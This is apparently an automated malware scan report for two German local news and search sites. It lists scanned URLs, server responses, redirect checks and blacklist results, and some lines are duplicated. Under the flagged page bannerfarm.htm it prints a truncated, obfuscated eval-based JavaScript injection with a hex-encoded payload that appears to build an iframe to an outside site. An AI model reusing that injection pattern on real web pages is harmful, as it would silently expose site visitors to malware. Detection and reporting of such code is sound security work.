Scanned pages/files
| Request | Server response | Status |
http://www.koblenzer-anzeiger.de/ | HTTP/1.1 200 OK Connection: close Date: Mon, 08 Dec 2014 15:59:15 GMT Accept-Ranges: bytes ETag: "f0618908-1bd5-4def284e69b00" Server: Apache Content-Length: 7125 Content-Type: text/html Last-Modified: Wed, 12 Jun 2013 10:31:40 GMT | clean |
http://www.unser-koblenz.de/cgi-bin/search.pl | 200 OK Content-Length: 39498 Content-Type: text/html | clean |
http://www.unser-koblenz.de/cgi-bin/search.pl?action=addurl | 200 OK Content-Length: 11165 Content-Type: text/html | clean |
http://www.unser-koblenz.de/cgi-bin/search.pl?action=addurl1 | 500 Internal Server Error Content-Length: 355 Content-Type: text/html | clean |
http://www.unser-koblenz.de/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
http://www.unser-koblenz.de/cgi-bin/search.pl?action=werbung | 200 OK Content-Length: 9157 Content-Type: text/html | clean |
http://www.unser-koblenz.de/cgi-bin/search.pl?action=impressum | 200 OK Content-Length: 7319 Content-Type: text/html | clean |
http://www.unser-koblenz.de/cgi-bin/../bannerfarm.htm | 200 OK Content-Length: 7152 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_6d_7a_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_6d_7a_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_4c_69_74_7c_77_76_7b_35_5f_71_6f_6f_6d_76_7b_6a_69_6b_70_36_6c_6d_37_4c_71_6d_2d_3a_38_4c_69_74_7c_77_76_7b Antivirus reports:
| ||
http://www.koblenzer-anzeiger.de/search.pl?action=werbung | 200 OK Content-Length: 9071 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/search.pl | 200 OK Content-Length: 38835 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/search.pl?action=addurl | 200 OK Content-Length: 11079 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/search.pl?action=addurl1 | 500 Internal Server Error Content-Length: 358 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/search.pl?action=impressum | 200 OK Content-Length: 7233 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/../bannerfarm.htm | 500 Internal Server Error Content-Length: 640 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/search.pl?action=agb | 200 OK Content-Length: 26310 Content-Type: text/html | clean |
http://www.koblenzer-anzeiger.de/../cgi-bin/search.pl?action=werbung | 500 Internal Server Error Content-Length: 640 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: koblenzer-anzeiger.de
Result:
GET / HTTP/1.1
Host: koblenzer-anzeiger.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: koblenzer-anzeiger.de
Referer: http://www.google.com/search?q=koblenzer-anzeiger.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: koblenzer-anzeiger.de
Referer: http://www.google.com/search?q=koblenzer-anzeiger.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=koblenzer-anzeiger.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://koblenzer-anzeiger.de/
Result: koblenzer-anzeiger.de is not infected or malware details are not published yet.
Result: koblenzer-anzeiger.de is not infected or malware details are not published yet.